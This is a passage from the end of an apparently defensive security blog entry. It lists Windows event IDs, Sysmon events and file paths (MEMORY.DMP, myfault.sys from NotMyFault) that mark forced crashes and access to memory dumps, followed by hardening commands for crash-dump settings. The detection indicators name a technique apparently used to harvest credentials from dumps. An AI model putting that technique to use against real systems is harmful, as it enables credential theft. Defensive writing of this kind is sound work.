  &lt;/section&gt;
  &lt;h3 id=&quot;YcsQ&quot;&gt;4. Sysmon EventID 11&lt;/h3&gt;
  &lt;p id=&quot;LH62&quot;&gt;&lt;strong&gt;4.1. Crash dump creation&lt;/strong&gt;&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;FJ1J&quot;&gt;&lt;strong&gt;File Path&lt;/strong&gt;: %SystemRoot%\MEMORY.DMP&lt;/p&gt;
    &lt;p id=&quot;a9gk&quot;&gt;or just&lt;/p&gt;
    &lt;p id=&quot;UDTo&quot;&gt;&lt;strong&gt;File Name:&lt;/strong&gt; MEMORY.DMP&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;NFeO&quot;&gt;&lt;strong&gt;4.2. NotMyFault&lt;/strong&gt;&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;jFil&quot;&gt;&lt;strong&gt;File Path:&lt;/strong&gt; %SystemRoot%\system32\drivers\myfault.sys&lt;/p&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;LRVo&quot;&gt;5. System EventID 12, 6008, 1001&lt;/h3&gt;
  &lt;p id=&quot;Mww7&quot;&gt;&lt;strong&gt;5.1. EventID 12&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;eHyG&quot;&gt;Failed to save a crash dump&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;ciNu&quot;&gt;The crash dump file could not be created due to a lack of free space on the destination drive. Increasing the amount of free space on the destination drive may help prevent this error.&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;9U5E&quot;&gt;&lt;strong&gt;5.2. EventID 6008&lt;/strong&gt;&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;hgvl&quot;&gt;The previous system shutdown at HH:mm:ss on ‎DD/‎MM/‎YYYY was unexpected.&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;3wSX&quot;&gt;&lt;strong&gt;5.3. EventID 1001&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;F5O9&quot;&gt;BSoD has occured&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;kvG7&quot;&gt;The computer has rebooted from a bugcheck. The bugcheck was: 0x000000ef (0xffffab8ea3c6a080, 0x0000000000000000, 0x0000000000000000, 0x0000000000000000). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: &amp;lt;GUID&amp;gt;.&lt;/p&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;YsFe&quot;&gt;6. Sysmon EventID 6&lt;/h3&gt;
  &lt;p id=&quot;2SlU&quot;&gt;&lt;strong&gt;6.1. NotMyFault&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;epaz&quot;&gt;Every time NotMyFault launches, this Sysmon EventID 6 is generated&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;Zci8&quot;&gt;&lt;strong&gt;ImageLoaded:&lt;/strong&gt; %SystemRoot%\System32\drivers\myfault.sys&lt;/p&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;sJUf&quot;&gt;7. Security EventID 4663&lt;/h3&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;sEta&quot;&gt;&lt;strong&gt;Object Name:&lt;/strong&gt; %SystemRoot%\MEMORY.DMP&lt;/p&gt;
    &lt;p id=&quot;7tXr&quot;&gt;&lt;strong&gt;Accesses&lt;/strong&gt;:&lt;/p&gt;
    &lt;ul id=&quot;MT9U&quot;&gt;
      &lt;li id=&quot;LL8I&quot;&gt;ReadAttributes&lt;/li&gt;
      &lt;li id=&quot;OqWu&quot;&gt;ReadData (or ListDirectory)&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/section&gt;
  &lt;section style=&quot;background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;Y86k&quot;&gt;⚠️ &lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;BPhR&quot;&gt;&lt;strong&gt;SACL &lt;/strong&gt;on %SystemRoot%\MEMORY.DMP must be configured&lt;/p&gt;
    &lt;p id=&quot;ddn7&quot;&gt;&lt;strong&gt;File Access Auditing&lt;/strong&gt; must be configrued:&lt;/p&gt;
    &lt;pre id=&quot;FUUe&quot;&gt;auditpol /set /subcategory:&amp;quot;File System&amp;quot; /success:enable&lt;/pre&gt;
  &lt;/section&gt;
  &lt;p id=&quot;PZMK&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;WMfx&quot;&gt;💪🏻 Hardening&lt;/h2&gt;
  &lt;h3 id=&quot;XCRx&quot;&gt;1. Turn off hibernation&lt;/h3&gt;
  &lt;pre id=&quot;W3oo&quot;&gt;powercfg /hibernate off&lt;/pre&gt;
  &lt;h3 id=&quot;zPWq&quot;&gt;2. Restrict access to crash dumps files&lt;/h3&gt;
  &lt;p id=&quot;TxJx&quot;&gt;Save crash dumps to folders which can be accessed by special users only (strong DACL)&lt;/p&gt;
  &lt;h3 id=&quot;VURl&quot;&gt;3. Do not allow full memory dump&lt;/h3&gt;
  &lt;p id=&quot;fN0G&quot;&gt;Configure GPO to periodically check CrashControl params, log a crash event to Event Log and disable full memory dump&lt;/p&gt;
  &lt;pre id=&quot;rOOv&quot;&gt;reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v LogEvent /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 0 /f&lt;/pre&gt;
  &lt;section style=&quot;background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;qAdI&quot;&gt;⚠️ &lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;TUG4&quot;&gt;Crash dumps can help you identify problems with your software, drivers, etc... So, it&amp;#x27;s not recommended to set CrashDumpEnabled value to 0x0.&lt;/p&gt;
    &lt;p id=&quot;Bwzs&quot;&gt;You would better use any of these values instead:&lt;/p&gt;
    &lt;ul id=&quot;I0ma&quot;&gt;
      &lt;li id=&quot;OKw4&quot;&gt;0x2 = Kernel memory dump&lt;/li&gt;
      &lt;li id=&quot;AEe0&quot;&gt;0x3 = Small memory dump (64 KB)&lt;/li&gt;
      &lt;li id=&quot;Qouz&quot;&gt;0x7 = Automatic memory dump&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;hngw&quot;&gt;4. Set VM snaphots retention&lt;/h3&gt;
  &lt;h3 id=&quot;DtE1&quot;&gt;5. Periodically change passwords&lt;/h3&gt;
  &lt;p id=&quot;QOOX&quot;&gt;Once a 30-45 days&lt;/p&gt;

</content></entry></feed>